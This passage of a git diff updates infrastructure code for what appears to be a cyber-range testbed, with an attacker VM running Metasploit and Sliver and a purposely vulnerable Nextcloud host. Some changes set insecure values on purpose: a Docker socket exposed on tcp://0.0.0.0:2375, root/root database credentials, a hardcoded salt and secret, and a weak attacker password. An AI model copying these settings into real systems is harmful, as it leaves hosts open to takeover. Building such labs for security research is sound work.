"localhost" attackmate_msf_passwd: "hackerman" attackmate_sliver_config: "/home/aecid/.sliver-client/configs/aecid_localhost.cfg" @@ -96,4 +93,4 @@ ansible.builtin.lineinfile: path: /etc/resolv.conf regexp: '^nameserver 8\.8\.8\.8$' - state: absent \ No newline at end of file + state: absent diff --git a/packer/attacker/playbook/requirements.yml b/packer/attacker/playbook/requirements.yml index 000d07bb..9c47fc34 100644 --- a/packer/attacker/playbook/requirements.yml +++ b/packer/attacker/playbook/requirements.yml @@ -8,8 +8,9 @@ roles: - src: https://github.com/ait-testbed/atb-ansible-postexploit.git version: v1.2.3 name: postexploit - - name: l50.sliver - version: v1.0.1 + - name: sliver + version: v0.1.0 + src: https://github.com/ait-testbed/atb-ansible-sliver.git - src: https://github.com/ait-testbed/atb-ansible-aeciduser.git version: v1.0.0 name: aeciduser @@ -20,7 +21,7 @@ roles: version: v0.0.1 name: seclists - src: https://github.com/ait-testbed/attackmate-ansible.git - version: v1.2.0 + version: v1.4.0 name: attackmate - src: https://github.com/ait-testbed/ansible-manage_unattended_upgrades.git version: v1.0.0 diff --git a/packer/corpdns/playbook/main.yaml b/packer/corpdns/playbook/main.yaml index c36e3303..0eb7655f 100644 --- a/packer/corpdns/playbook/main.yaml +++ b/packer/corpdns/playbook/main.yaml @@ -5,11 +5,15 @@ suricata_interface: [ens3] suricata_pcap_log: False netflow_enabled: true + hostname: "corpdns" pre_tasks: + - name: Change hostname + ansible.builtin.hostname: + name: "{{hostname}}" - name: Ensure dynamic hostname is in /etc/hosts with 127.0.1.1 ansible.builtin.lineinfile: path: /etc/hosts - line: "127.0.1.1\t\t\t\t{{ ansible_hostname }}" # Uses the system's current hostname + line: "127.0.1.1\t\t\t\t{{hostname}}" # Uses the system's current hostname state: present create: true # Creates the file if it doesn't exist owner: root @@ -36,12 +40,14 @@ dnsmasq_config: - { name: "logging", content: "log-queries" } - { name: "host-video", content: "host-record=video.attackbed.com,192.42.0.254" } + - { name: "host-mail", content: "host-record=mail.attackbed.com,192.42.0.254" } - { name: "host-firewall", content: "host-record=fw.attackbed.com,192.42.0.254" } - { name: "host-repo", content: "host-record=repo.attackbed.com,192.42.0.254" } - { name: "host-domain", content: "host-record=attackbed.com,192.42.0.254" } - { name: "auth-zone", content: "auth-zone=attackbed.com,192.42.0.254" } - { name: "auth-server", content: "auth-server=192.42.0.233,,ens3" } - { name: "domain", content: "domain=attackbed.com" } + - { name: "mail", content: "mx-host=attackbed.com,mail.attackbed.com,50" } - { name: "local-domain", content: "local=/attackbed.com/192.42.0.254" } - role: filebeat vars: @@ -83,15 +89,3 @@ path: /etc/hosts line: "192.42.0.254 kafka.attackbed.local" state: present - post_tasks: - - name: Remove dynamic hostname from /etc/hosts - ansible.builtin.lineinfile: - path: /etc/hosts - regexp: '^127\.0\.1\.1\s+{{ ansible_hostname }}$' - state: absent - become: true - - name: Ensure 127.0.0.1 is present in /etc/hosts - ansible.builtin.lineinfile: - path: "/etc/hosts" - line: "127.0.0.1\tcorpdns" - state: present diff --git a/packer/docker/playbook/main.yaml b/packer/docker/playbook/main.yaml index e01a7427..a678c47a 100644 --- a/packer/docker/playbook/main.yaml +++ b/packer/docker/playbook/main.yaml @@ -16,9 +16,10 @@ - role: nextcloudrce vars: nextcloud_rce_start_container: false #Needed to prevent the start of containers at atb-ansible-nextcloudrce role before mail feature - nextcloud_rce_domain: "localhost:8080" + nextcloud_rce_domain: "192.42.0.254:8080" nextcloud_mail_image: "ghcr.io/ait-testbed/attackbed/nextcloud-mail:1.0.0" nextcloud_rce_docker_compose_template: "docker-compose-mail.yml.j2" + nextcloud_rce_configfile: "nc-config.php.j2" - role: vulndockerd vars: vulndockerd_socket: "tcp://0.0.0.0:2375" @@ -27,6 +28,14 @@ vars: wazuh_manager: 192.168.100.130 wazuh_localfiles: + - log_format: audit + location: /var/log/audit/audit.log + - log_format: syslog + location: /var/log/*.log + - log_format: syslog + location: /opt/nextcloud/log/*.log + - log_format: json + location: /opt/nextcloud/nclog/*.log - log_format: json location: /var/lib/docker/containers/*/*-json.log tasks: @@ -36,6 +45,13 @@ state: directory mode: '0755' + - name: Ensure nclog directory exists + ansible.builtin.file: + path: "{{ nextcloud_rce_dir }}/nclog" + state: directory + mode: '0755' + owner: 'www-data' + - name: Ensure mailconfig directories exist ansible.builtin.file: path: "{{ nextcloud_rce_dir }}/mailconfig/{{ item }}" @@ -46,6 +62,11 @@ - dovecot - dovecot/conf.d + - name: Ensure nextcloud config exist + ansible.builtin.file: + path: "{{ nextcloud_rce_dir }}/config.php" + owner: 'www-data' + - name: Deploy Dovecot/Postfix config files ansible.builtin.template: src: "{{ item.src }}" diff --git a/packer/docker/playbook/requirements.yml b/packer/docker/playbook/requirements.yml index f9442898..597b5305 100644 --- a/packer/docker/playbook/requirements.yml +++ b/packer/docker/playbook/requirements.yml @@ -1,6 +1,6 @@ roles: - src: https://github.com/ait-testbed/ansible-manage_unattended_upgrades.git - version: v1.0.0 + version: v0.0.0 name: manage_unattended_upgrades - src: https://github.com/ait-testbed/ansible-auditd.git version: v1.1 @@ -15,7 +15,7 @@ roles: version: v1.1.0 name: aecidtools - src: https://github.com/ait-testbed/atb-ansible-nextcloudrce.git - version: v1.0.2 + version: v1.0.4 name: nextcloudrce - src: https://github.com/ait-testbed/atb-ansible-vulndockerd.git version: v1.0.0 diff --git a/packer/docker/playbook/templates/docker-compose-mail.yml.j2 b/packer/docker/playbook/templates/docker-compose-mail.yml.j2 index 654d9fbc..d65b0451 100644 --- a/packer/docker/playbook/templates/docker-compose-mail.yml.j2 +++ b/packer/docker/playbook/templates/docker-compose-mail.yml.j2 @@ -24,6 +24,7 @@ services: - db volumes: - ${PWD}/config.php:/var/www/nextcloud/config/config.php + - ${PWD}/nclog:/var/www/nextcloud/nclog environment: - MYSQL_PASSWORD=root - MYSQL_DATABASE=nextcloud @@ -49,4 +50,4 @@ services: ports: - "143:143" - "587:587" - - "25:25" \ No newline at end of file + - "25:25" diff --git a/packer/docker/playbook/templates/nc-config.php.j2 b/packer/docker/playbook/templates/nc-config.php.j2 new file mode 100644 index 00000000..5305500d --- /dev/null +++ b/packer/docker/playbook/templates/nc-config.php.j2 @@ -0,0 +1,49 @@ + '/', + 'memcache.local' => '\\OC\\Memcache\\APCu', + 'apps_paths' => + array ( + 0 => + array ( + 'path' => '/var/www/nextcloud/apps', + 'url' => '/apps', + 'writable' => false, + ), + 1 => + array ( + 'path' => '/var/www/nextcloud/custom_apps', + 'url' => '/custom_apps', + 'writable' => true, + ), + ), + 'passwordsalt' => 'iPv6aSpscWlbR178W8jVR21BJ2nph5', + 'secret' => '+NGIlhsEmuRyQNbNpX6BwiFKV8fv/Bk8FAUd0yhN0Bzllhv4', + 'trusted_domains' => + array ( + 0 => 'localhost', + 1 => '{{nextcloud_rce_domain}}', + ), + 'datadirectory' => '/var/www/nextcloud/data', + 'dbtype' => 'mysql', + 'version' => '24.0.5.1', + 'overwrite.cli.url' => 'http://localhost', + 'dbname' => 'nextcloud', + 'dbhost' => 'db', + 'dbport' => '', + 'dbtableprefix' => 'oc_', + 'mysql.utf8mb4' => true, + 'dbuser' => 'root', + 'dbpassword' => 'root', + 'installed' => true, + 'instanceid' => 'oc2g02diujsz', + 'log_type' => 'file', + 'logfile' => 'nclog/nextcloud.log', + 'loglevel' => 0, + 'log.condition' => [ + 'apps' => ['admin_audit'], + ], + 'log_type_audit' => 'file', + 'syslog_tag_audit' => 'Nextcloud', + 'logfile_audit' => 'nclog/audit.log', +); diff --git a/packer/firewall/playbook/main.yaml b/packer/firewall/playbook/main.yaml index c14a299c..63b7d4a7 100644 --- a/packer/firewall/playbook/main.yaml +++ b/packer/firewall/playbook/main.yaml @@ -20,6 +20,18 @@ group: root mode: '0644' become: true + + - name: Create dnsmasq-resolv.conf + ansible.builtin.lineinfile: + path: /etc/resolv.conf-dnsmasq + line: "nameserver 192.42.2.2" # Uses the system's current hostname + state: present + create: true # Creates the file if it doesn't exist + owner: root + group: root + mode: '0644' + become: true + tasks: - name: Allow password login @@ -65,6 +77,7 @@ - role: dnsmasq vars: dnsmasq_config: + - { name: "resolver", content: "resolv-file=/etc/resolv.conf-dnsmasq" } - { name: "logging", content: "log-queries" } - { name: "puppetserver", content: "address=/puppet.{{ internal_domain }}/172.17.100.122" } - { name: "linuxshare", content: "address=/linuxshare.{{ internal_domain }}/192.168.100.23" } @@ -116,6 +129,8 @@ rules: - Cloud Ports - { action: DNAT, source: inet, dest: "dmz:$CLOUD", proto: tcp, dest_port: 8080 } + - { action: DNAT, source: inet, dest: "dmz:$CLOUD", proto: tcp, dest_port: 25 } + - { action: DNAT, source: inet, dest: "dmz:$CLOUD", proto: tcp, dest_port: 143 } - Videoserver Ports - { action: DNAT, source: inet, dest: "dmz:$VIDEOSERVER", proto: tcp, dest_port: 80 } - { action: DNAT, source: inet, dest: "dmz:$VIDEOSERVER:22", proto: tcp, dest_port: 2222 } diff --git a/terragrunt/attacker/terragrunt.hcl b/terragrunt/attacker/terragrunt.hcl index e8a84350..47a2c5c2 100644 --- a/terragrunt/attacker/terragrunt.hcl +++ b/terragrunt/attacker/terragrunt.hcl @@ -14,5 +14,5 @@ inputs = { include { - path = find_in_parent_folders() + path = find_in_parent_folders("root.hcl") } diff --git a/terragrunt/bootstrap/module/main.tf b/terragrunt/bootstrap/module/main.tf index 6aa02a5c..595bd3fd 100644 --- a/terragrunt/bootstrap/module/main.tf +++ b/terragrunt/bootstrap/module/main.tf @@ -6,6 +6,7 @@ locals { ext_dns_userdata_file = var.ext_dns_userdata == null ? "${path.module}/scripts/dns.yml" : var.ext_dns_userdata fw_userdata_file = var.fw_userdata == null ? "${path.module}/scripts/firewallinit.yml" : var.fw_userdata mgmt_userdata_file = var.mgmt_userdata == null ? "${path.module}/scripts/mgmtinit.yml" : var.mgmt_userdata + ext_dnsserver_userdata_file = var.corpdns_userdata == null ? "${path.module}/scripts/corpdns.yml" : var.corpdns_userdata } @@ -356,10 +357,6 @@ resource "openstack_networking_floatingip_associate_v2" "mgmt" { } -locals { - ext_dnsserver_userdata_file = var.dnsserver_userdata == null ? "${path.module}/scripts/corpdns.yml" : var.dnsserver_userdata -} - #################################################################### # # CREATE INSTANCE for "DNS-Server" @@ -381,13 +378,13 @@ data "template_cloudinit_config" "cloudinitdnsserver" { } data "openstack_images_image_v2" "dnsserver-image" { - name = var.dnsserver_image + name = var.corpdns_image most_recent = true } resource "openstack_compute_instance_v2" "dnsserver" { name = "corpdns" - flavor_name = var.dnsserver_flavor + flavor_name = var.corpdns_flavor key_pair = var.sshkey image_id = data.openstack_images_image_v2.dnsserver-image.id user_data = local.ext_dnsserver_userdata_file == null ? null : data.template_cloudinit_config.cloudinitdnsserver[0].rendered @@ -401,4 +398,4 @@ resource "openstack_compute_instance_v2" "dnsserver" { depends_on = [ openstack_networking_network_v2.internet, ] -} \ No newline at end of file +} diff --git a/terragrunt/bootstrap/module/variables.tf b/terragrunt/bootstrap/module/variables.tf index 08fdcf17..70d8eeff 100644 --- a/terragrunt/bootstrap/module/variables.tf +++ b/terragrunt/bootstrap/module/variables.tf @@ -64,20 +64,20 @@ variable "mgmt_flavor" { default = "d2-2" } -variable "dnsserver_image" { +variable "corpdns_image" { type = string - description = "image of the dnsserver host" + description = "image of the corpdns-server host" } -variable "dnsserver_flavor" { +variable "corpdns_flavor" { type = string - description = "flavor of the dnsserver host" + description = "flavor of the corpdns-server host" default = "d2-8" } -variable "dnsserver_userdata" { +variable "corpdns_userdata" { type = string - description = "Userdata for the dnsserver virtual machine" + description = "Userdata for the corpdns-server virtual machine" default = null } diff --git a/terragrunt/bootstrap/terragrunt.hcl b/terragrunt/bootstrap/terragrunt.hcl index 7af7c4f0..7b1ab876 100644 --- a/terragrunt/bootstrap/terragrunt.hcl +++ b/terragrunt/bootstrap/terragrunt.hcl @@ -19,5 +19,5 @@ inputs = { include { - path = find_in_parent_folders() + path = find_in_parent_folders("root.hcl") } diff --git a/terragrunt/client/terragrunt.hcl b/terragrunt/client/terragrunt.hcl index 9ecd877e..2c576e89 100644 --- a/terragrunt/client/terragrunt.hcl +++ b/terragrunt/client/terragrunt.hcl @@ -15,5 +15,5 @@ inputs = { include { - path = find_in_parent_folders() + path = find_in_parent_folders("root.hcl") } diff --git a/terragrunt/docker/terragrunt.hcl b/terragrunt/docker/terragrunt.hcl index bf55d24c..d025da65 100644 --- a/terragrunt/docker/terragrunt.hcl +++ b/terragrunt/docker/terragrunt.hcl @@ -14,5 +14,5 @@ inputs = { include { - path = find_in_parent_folders() + path = find_in_parent_folders("root.hcl") } diff --git a/terragrunt/lanturtle/terragrunt.hcl b/terragrunt/lanturtle/terragrunt.hcl index afa70140..929fee9a 100644 --- a/terragrunt/lanturtle/terragrunt.hcl +++ b/terragrunt/lanturtle/terragrunt.hcl @@ -16,5 +16,5 @@ inputs = { include { - path = find_in_parent_folders() + path = find_in_parent_folders("root.hcl") } diff --git a/terragrunt/logging/terragrunt.hcl b/terragrunt/logging/terragrunt.hcl index 8adf9bbb..99bf672b 100644 --- a/terragrunt/logging/terragrunt.hcl +++ b/terragrunt/logging/terragrunt.hcl @@ -16,5 +16,5 @@ inputs = { include { - path = find_in_parent_folders() + path = find_in_parent_folders("root.hcl") } diff --git a/terragrunt/repository/terragrunt.hcl b/terragrunt/repository/terragrunt.hcl index 4d21fd3d..de0905c6 100644 --- a/terragrunt/repository/terragrunt.hcl +++ b/terragrunt/repository/terragrunt.hcl @@ -14,5 +14,5 @@ inputs = { include { - path = find_in_parent_folders() + path = find_in_parent_folders("root.hcl") } diff --git a/terragrunt/terragrunt.hcl b/terragrunt/root.hcl similarity index 100% rename from terragrunt/terragrunt.hcl rename to terragrunt/root.hcl diff --git a/terragrunt/target/terragrunt.hcl b/terragrunt/target/terragrunt.hcl index d9c9c9ce..56175c4f 100644 --- a/terragrunt/target/terragrunt.hcl +++ b/terragrunt/target/terragrunt.hcl @@ -15,5 +15,5 @@ inputs = { include { - path = find_in_parent_folders() + path = find_in_parent_folders("root.hcl") } diff --git a/terragrunt/videoserver/terragrunt.hcl b/terragrunt/videoserver/terragrunt.hcl index a951bfd8..f35392a9 100644 --- a/terragrunt/videoserver/terragrunt.hcl +++ b/terragrunt/videoserver/terragrunt.hcl @@ -16,5 +16,5 @@ inputs = { include { - path = find_in_parent_folders() + path = find_in_parent_folders("root.hcl") } diff --git a/terragrunt/wazuh/terragrunt.hcl b/terragrunt/wazuh/terragrunt.hcl index 999c5ef7..8fcd1234 100644 --- a/terragrunt/wazuh/terragrunt.hcl +++ b/terragrunt/wazuh/terragrunt.hcl @@ -14,5 +14,5 @@ inputs = { include { - path = find_in_parent_folders() + path = find_in_parent_folders("root.hcl") }